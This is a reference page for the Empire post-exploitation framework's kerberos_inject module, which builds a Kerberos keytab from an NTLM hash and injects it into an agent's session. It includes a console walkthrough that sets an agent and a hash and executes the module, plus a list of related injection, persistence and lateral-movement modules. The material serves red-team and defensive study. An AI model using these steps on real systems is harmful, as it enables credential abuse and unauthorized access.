Kerberos inject - Empire Module
This page contains detailed information about how to use the python/management/multi/kerberos_inject Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Kerberos inject
Module: python/management/multi/kerberos_inject
Source code:
empire/server/modules/python/management/multi/kerberos_inject.yaml
MITRE ATT&CK:
T1055
Language: Python
Needs admin: No
OPSEC safe: No
Background: No
The kerberos_inject module generates a kerberos keytab and injects it into the current runspace.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the kerberos_inject module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the kerberos_inject module:
Agent
Agent to execute module on.
Hash
NTLM Hash for the principal.
Keytab
Keytab file to create.
Default value: user.keytab
.
Principal
The service principal name. [email protected].
Kerberos_inject Example Usage
Here's an example of how to use the kerberos_inject module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/multi/bash) > usemodule python/management/multi/kerberos_inject
Author @424f424f
Background False
Comments Thanks to @passingthehash for bringing this up.
Description Generates a kerberos keytab and injects it into the current runspace.
Language python
Name python/management/multi/kerberos_inject
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1055
,Record Options-----------,----------,------------------------------,
| Name | Value | Required | Description |
|-----------|-------------|----------|------------------------------|
| Agent | | True | Agent to execute module on. |
|-----------|-------------|----------|------------------------------|
| Hash | | True | NTLM Hash for the principal. |
|-----------|-------------|----------|------------------------------|
| Keytab | user.keytab | True | Keytab file to create. |
|-----------|-------------|----------|------------------------------|
| Principal | | True | The service principal name. |
| | | | [email protected] |
'-----------'-------------'----------'------------------------------'
(Empire: usemodule/python/management/multi/kerberos_inject) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/management/multi/kerberos_inject) > set Hash 5fbc3d5fec8206a30f4b6c473d68ae76
[*] Set Hash to 5fbc3d5fec8206a30f4b6c473d68ae76
(Empire: usemodule/python/management/multi/kerberos_inject) > set Keytab user.keytab
[*] Set Keytab to user.keytab
(Empire: usemodule/python/management/multi/kerberos_inject) > set Principal value
[*] Set Principal to value
(Empire: usemodule/python/management/multi/kerberos_inject) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/python/management/multi/kerberos_inject.yaml
- http://attack.mitre.org/techniques/T1055
See Also
Check also the following modules related to this module:
- python/management/multi/spawn
- python/management/multi/socks
- python/collection/osx/kerberosdump
- powershell/credentials/credential_injection
- powershell/management/reflective_inject
- python/management/osx/shellcodeinject64
- powershell/code_execution/invoke_reflectivepeinjection
- powershell/code_execution/invoke_dllinjection
- powershell/management/shinject
- powershell/management/psinject
- powershell/situational_awareness/network/get_kerberos_service_ticket
- python/situational_awareness/host/multi/WorldWriteableFileSearch
- python/situational_awareness/host/multi/SuidGuidSearch
- python/privesc/multi/bashdoor
- python/privesc/multi/sudo_spawn
- python/persistence/multi/crontab
- python/persistence/multi/desktopfile
- python/lateral_movement/multi/ssh_launcher
- python/lateral_movement/multi/ssh_command
- powershell/management/enable_multi_rdp
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.